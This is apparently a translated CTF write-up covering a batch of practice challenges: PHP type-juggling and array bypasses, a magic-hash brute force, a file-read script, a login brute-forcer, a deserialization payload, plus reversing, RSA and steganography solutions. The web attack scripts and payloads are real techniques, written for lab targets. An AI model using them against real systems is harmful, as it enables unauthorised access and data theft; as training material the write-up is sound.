Ugh, a heap of easy problems, and most of them are reused from elsewhere. I qualified for the onsite final but have no time to go, it's too rushed.
<?php
$flag = '*********';
if (isset ($_GET['password'])) {
    // ereg() returns NULL (not FALSE) when given an array, so this branch is skipped for password[]=...
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo "You password must be alphanumeric\n";
    // strpos() on an array also returns NULL, and NULL !== FALSE
    else if (strpos ($_GET['password'], '--') !== FALSE)
        die($flag);
    else
        echo "Invalid password\n";
}
?>
<section class="login">
    <div class="title">
        <a href="./index.phps">View Source</a>
    </div>
    <form method="POST">
        <input type="text" required name="password" placeholder="Password" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>
Since ereg has to be bypassed while the value must still contain --, this is simple:
http://ctf1.shiyanbar.com/shian-rao/?password[]=--
flag{Maybe_using_rexpexp_wasnt_a_clever_move}
The file parameter at the end is the base64 of a file name, so it should be possible to read the source of arbitrary files; line controls which line is displayed, so write a script:
import requests

# file=aW5kZXgucGhw is base64("index.php"); fetch it one line at a time
url = "http://ctf1.shiyanbar.com/shian-quqi/index.php?line={0}&file=aW5kZXgucGhw"
for i in range(0, 20):
    url1 = url.format(i)
    s = requests.get(url1)
    print(s.text)
This gives the index.php code:
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA==");
$file_list = array(
    '0' =>'key.txt',
    '1' =>'index.php',
);
// the flag file only becomes readable with this cookie value
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){
    $file_list[2]='thisis_flag.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>
Simple: just add the cookie.
flag{UHGgd3rfH*(3HFhuiEIWF}
A simple code audit: x1 must not be all digits yet still compare greater than 2017, so 2018a.
The second check is passed by constructing an array for that case, and the third needs brute force.
Script:
import random
import hashlib
import re


def md5(s):
    m = hashlib.md5()
    m.update(s.encode())
    return m.hexdigest()


# print the target substring once for comparison
print(md5("15562")[8:24])
while True:
    # random 4-character suffix after the fixed prefix XIPU
    s = 'XIPU' + ''.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890', 4))
    # substr(md5, 8, 16) of the form 0e followed by 14 digits is a "magic hash":
    # PHP's loose == treats it as the number 0
    if re.findall(r'^0e[0-9]{14}$', md5(s)[8:24]):
        print(s, md5(s)[8:24])
        break
CTF{Php_1s_bstl4_1a}
Uh, obviously this is brute-forcing the password.
Script:
import requests

cookies = {
    "PHPSESSID": "baukg3luocsduh2a1khcqoshh2"
}
url1 = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={0}&randcode={1}"
url = "http://ctf1.shiyanbar.com/shian-s/"

# try every 5-digit password; the randcode is re-read from the page before each attempt
for num1 in (f"{n:05d}" for n in range(100000)):
    s = requests.get(url, cookies=cookies)
    string = s.text
    num = string.find("randcode")
    print(num)
    num2 = string[num + 30:num + 33]   # the 3-character randcode following the label
    print(num2)
    url2 = url1.format(num1, num2)
    print(url2)
    s2 = requests.get(url2, cookies=cookies)
    if "{" in s2.text:
        print(s2.text)
        raise SystemExit(0)
    # print(string[num+16::3])
flag{U1tkOdgutaVWucdy2AbDWXPGkDx9bS2a}
First, use a PHP wrapper (php:// pseudo-protocol) to write a file.
Then notice there is a file inclusion further on, so read the source of class.php directly.
Construct the serialized object:
<?php
class Read{//f1a9.php
    public $file;
    // __toString is triggered when the object is used as a string, reading $file
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}
$a = new Read();
$a->file="f1a9.php";
echo serialize($a);
?>
flag_Xd{hSh_ctf:e@syt0g3t}
Looking at the hex, the end of the file is a JPEG file header,
so just write a script to reverse it:
# write the file's bytes in reverse order
with open("C:/Users/lanlan/Desktop/reverseMe", 'rb') as f, \
        open("C:/Users/lanlan/Desktop/flag.png", 'wb') as g:
    g.write(f.read()[::-1])
Reversed, and that's it.
flag{4f7548f93c7bef1dc6a0542cf04e796e}
A math problem:
# find the 5-digit number whose reversal is four times itself
for i in range(10000, 100000):
    str1 = str(i)
    str2 = str1[::-1]
    print(i, str2)
    if i * 4 == int(str2):
        print(int(str2))
        break
Running it gives the result 87912.
A traffic capture; the conf1g.php in it is the uploaded webshell, and searching further reveals an unusual image download.
fl4g:{ftop_Is_Waiting_4_y}
Analysing the decompiled code shows that a specific broadcast is needed to trigger the relevant Activity in the APK.
The key detail is that the msg value in the extras is OpenSesame; the am tool can be invoked with root privileges through adb.
Clicking the BROADCAST button makes the APK send a broadcast whose content is the key string after processing.
To receive that broadcast, a broadcast receiver was created.
Main code:
// register for the action the APK broadcasts
IntentFilter intentFilter = new IntentFilter();
intentFilter.addAction("com.flagstore.ctf.OUTGOING_INTENT");
BroadcastReceiver receiver = new NetworkChangeReceiver();
registerReceiver(receiver, intentFilter);

class NetworkChangeReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        // show the msg extra carried by the broadcast
        Toast.makeText(context, "getMessage" + intent.getStringExtra("msg"), Toast.LENGTH_SHORT).show();
    }
}
Install this receiver on the phone and start it.
After clicking BROADCAST, the received message is displayed:
That gives the flag.
After entering input, look for the algorithm; it is here:
The key is that comparison: eax is computed from the input, and ecx is fetched from memory. Once that is understood, write the algorithm:
a = [0xB9, 0x3A, 0xA9, 0xD8, 0x15, 0x8A, 0xE7, 0x42, 0x69, 0x90, 0xCA, 0xA3, 0x4D, 0xD8, 0xD9, 0xC9]
f = ""
# for each position, find the printable byte j whose transform matches the stored value
for i in range(16):
    for j in range(33, 128):
        if ((2 * j - 6) ^ j) - 2 * i == a[i]:
            f += chr(j)
            break
print(f)
flag:mBqL!zS6-hLm)XY_
This one takes some guessing. From the problem you can compute many passwords (strictly speaking, only 9 of the positions can be determined), but we can compute the XOR values ourselves and then determine the complete flag.
This is the code that computes the XOR values:
#include <stdio.h>

int main(void)
{
    unsigned int v9;   /* LCG state; unsigned so the 32-bit wraparound is well defined */
    int v8, v4, v7;
    for (v7 = 0; v7 <= 21; v7++)
    {
        v4 = v7 + 1;
        v9 = 0;
        v8 = 0;
        while (v8 < v4)            /* run the LCG v4 times from seed 0 */
        {
            ++v8;
            v9 = 1828812941u * v9 + 12345u;
        }
        printf("0x%x,", (unsigned char)v9);   /* the low byte is the XOR value */
    }
    printf("\n");
    return 0;
}
Then, using the complete set of XOR values, compute the complete flag:
a = bytes.fromhex("5FF25E8B4E0EA3AAC793813D5F74A309912B49289367")
print(len(a))
# keystream bytes printed by the C program above
xor = [0x39, 0x9e, 0x3f, 0xec, 0x35, 0x6a, 0x9b, 0x98, 0xf1, 0xf6, 0xb7, 0x4,
       0x6d, 0x42, 0x93, 0x30, 0xa9, 0x4e, 0x2f, 0x1c, 0xa5, 0x1a]
r = ""
for i in range(22):
    r += chr(a[i] ^ xor[i])
print(r)
flag:flag{d826e6926098ef46}
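As an added example (not the author's scripts), the C keystream generator and the XOR step above combined into one Python 3 script. It also shows why the keystream is weak: only the low byte of the 32-bit LCG state is kept, and that byte depends solely on the low byte of the previous state, so the same keystream comes out of an 8-bit recurrence.

```python
# Added example: regenerate the XOR keystream from the LCG in the C snippet
# and decrypt the hard-coded ciphertext (constants taken from the page).
A, C = 1828812941, 12345
CIPHERTEXT = bytes.fromhex("5FF25E8B4E0EA3AAC793813D5F74A309912B49289367")


def keystream_lcg32(length):
    """Low byte of the 32-bit LCG state after 1..length steps from seed 0.

    Mirrors the C loop: the state wraps modulo 2**32, and the cast to an
    8-bit unsigned value keeps only the lowest byte.
    """
    state, out = 0, []
    for _ in range(length):
        state = (A * state + C) & 0xFFFFFFFF
        out.append(state & 0xFF)
    return out


def keystream_lcg8(length):
    """The same keystream computed purely modulo 256.

    (A*x + C) mod 256 depends only on x mod 256, so the truncated keystream
    is just an 8-bit LCG: at most 256 distinct bytes before it repeats,
    whatever the upper bits of the 32-bit state do.
    """
    state, out = 0, []
    for _ in range(length):
        state = (A * state + C) & 0xFF
        out.append(state)
    return out


def decrypt(ciphertext, keystream):
    """Byte-wise XOR of the ciphertext with the keystream."""
    return bytes(c ^ k for c, k in zip(ciphertext, keystream)).decode("ascii")


if __name__ == "__main__":
    ks = keystream_lcg32(len(CIPHERTEXT))
    print(",".join(f"0x{k:x}" for k in ks))   # same list the C program prints
    print(decrypt(CIPHERTEXT, ks))
```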
This is .NET reversing, and a reused problem.
Open it in Reflector, export it, and look at the code in VS:
The program roughly encrypts the string CreateByTenshine and compares the result with the input. The encryption is simple too: XOR in turn with the 2nd through 15th numbers of [0x2, 0x3, 0x5, 0x7, 0xb, 0xd, 0x11, 0x13, 0x17, 0x1d, 0x1f, 0x25, 0x29, 0x2b, 0x2f, 0x35, 0x3b, 0x3d, 0x43, 0x47, 0x49, 0x4f, 0x53, 0x59, 0x61, 0x65, 0x67, 0x6b, 0x6d, 0x71], delete any -, then compute the MD5.
import hashlib

str1 = [0x2, 0x3, 0x5, 0x7, 0xb, 0xd, 0x11, 0x13, 0x17, 0x1d, 0x1f, 0x25, 0x29, 0x2b, 0x2f, 0x35,
        0x3b, 0x3d, 0x43, 0x47, 0x49, 0x4f, 0x53, 0x59, 0x61, 0x65, 0x67, 0x6b, 0x6d, 0x71]
str2 = "CreateByTenshine"
str3 = ""
for i in range(len(str2)):
    t = ord(str2[i])
    for j in range(1, 15):      # XOR with the 2nd through 15th values in turn
        t = str1[j] ^ t
    str3 += chr(t)
str3 = str3.replace('-', '')    # strings are immutable, so drop '-' with replace
print(str3)
m = hashlib.md5()
m.update(str3.encode())
result = m.hexdigest()
print('flag{' + result.upper() + '}')   # the flag uses upper-case hex
Final flag: flag{967DDDFBCD32C1F53527C221D9E40A0B}
A 64-bit ELF. The function sub_40084A performs anti-debugging; when debugging dynamically, just change eax:
Looking at the main function, the key is sub_40074D.
The function checks:
Find the address of qword_601080 dynamically:
At the very start an array is built, from n to w. The input string is then checked against the positions it should occupy in that array (5, 2, 7, 2, 5, 6, counting from 1), and the final comparison is at this position:
So, combined with the array that was built, the final result is rotors:
The IDA decompilation of this one is uncomfortable to read because it uses the C++ STL, which makes some function names very long. Searching strings turned up one that looks like a flag (it has left and right curly braces):
Walk through the flow and set a breakpoint at the input:
Then this hard-coded string was found in memory: dfhlnrtxdflprvbhjptvbhjptvbfltxzdfjxbhj
Going further down, the input is encrypted by sub_401210.
The output has the same length as the input, but it is not a plain Caesar shift, since identical input characters give different outputs. That string is used during encryption, so the guess is that the flag encrypted with it has become: FYM-OI}olte_zi_wdqedd_djrzuj_shgmEDFqo{
So write a script and run it:
s1 = 'FYM-OI}olte_zi_wdqedd_djrzuj_shgmEDFqo{'
s2 = 'dfhlnrtxdflprvbhjptvbhjptvbfltxzdfjxbhj'
s1 = list(s1)
for i in range(len(s1)):
    pos = ord(s2[i]) - ord('a')   # per-position shift taken from the key string
    if s1[i] == '{':
        s1[i] = '}'
    elif s1[i] == '}':
        s1[i] = '{'
    elif s1[i] == '_':
        pass
    else:
        # undo the shift within the same case, wrapping around the alphabet
        if s1[i].islower():
            s1[i] = chr(ord(s1[i]) - pos % 26)
            if ord(s1[i]) < ord('a'):
                s1[i] = chr(ord(s1[i]) + 26)
        elif s1[i].isupper():
            s1[i] = chr(ord(s1[i]) - pos % 26)
            if ord(s1[i]) < ord('A'):
                s1[i] = chr(ord(s1[i]) + 26)
        else:
            pass
print(s1)
f = ''.join(s1)
print(f)
This one just gives n and c, and e should be 3, so bystudent's script can be used directly:
from libnum import n2s
from gmpy2 import iroot

n = 92164540447138944597127069158431585971338721360079328713704210939368383094265948407248342716209676429509660101179587761913570951794712775006017595393099131542462929920832865544705879355440749903797967940767833598657143883346150948256232023103001435628434505839331854097791025034667912357133996133877280328143
e = 3
c = 2044619806634581710230401748541393297937319
# small e with a short message: c + i*n is a perfect cube for some small i
i = 0
while True:
    res = iroot(c + i * n, 3)
    if res[1]:
        print(res)
        break
    print("i=" + str(i))
    i = i + 1
m = 126922179506039   # the cube root found above
print(n2s(m))
so_low
A problem done before. Analysing it with stegsolve found nothing, but by observation the RGB channels are off, so apply the script directly:
# -*- coding: utf8 -*-
# low
from PIL import Image


def foo():
    im = Image.open('C:/Users/lanlan/Desktop/low.bmp')
    im2 = im.copy()
    pix = im2.load()
    width, height = im2.size
    # assumes a single-channel (8-bit) image, so pix[x, y] is an int
    for x in range(0, width):
        for y in range(0, height):
            # LSB: pixels whose lowest bit is 0 become white, the rest black
            if pix[x, y] & 0x1 == 0:
                pix[x, y] = 255
            else:
                pix[x, y] = 0
    im2.show()


if __name__ == '__main__':
    foo()
    print('ok')
flag{139711e8e9ed545e}
This one is easy too: process the stripes on the zebra to get a barcode, then scan it.
FLAG IS TENSHINE
Annoyingly, the flag turns out to be lowercase:
tenshine
A pile of fragments; piece them together in Photoshop:
Create-By-SimpleLab
First there is an image; analysing it with StegSolve reveals a QR code.
Scanning the code gives a string:
Guessing it is hex: the start looks like a pyc header, so save it and decompile it to recover the original Python code:
#!/usr/bin/env python
# encoding: utf-8
# visit http://tool.lu/pyc/ for more information


def flag():
    # ASCII codes of the flag characters
    codes = [102, 108, 97, 103, 123, 51, 56, 97, 53, 55, 48, 51, 50, 48, 56,
             53, 52, 52, 49, 101, 55, 125]
    flag = ''
    for i in codes:
        flag += chr(i)
    print(flag)


flag()
flag{38a57032085441e7}